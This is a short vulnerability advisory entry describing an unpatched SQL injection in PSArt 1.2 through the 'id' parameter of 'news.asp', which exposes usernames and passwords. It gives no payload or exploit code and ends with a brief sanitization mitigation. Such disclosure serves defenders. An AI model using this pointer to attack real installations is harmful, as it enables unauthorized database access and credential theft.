Vendor: PSArt
By: Securitylab.ir
CVSS: 8.8 (HIGH)
SQL Injection
CWE: 89
Product Name: PSArt
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: PSArt
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
PSArt 1.2 Vulnerability
A SQL injection vulnerability was discovered in PSArt 1.2. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'news.asp' script. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable script, which will then be executed in the backend database. This can result in the disclosure of sensitive information such as usernames and passwords.
Mitigation:
The vendor should ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.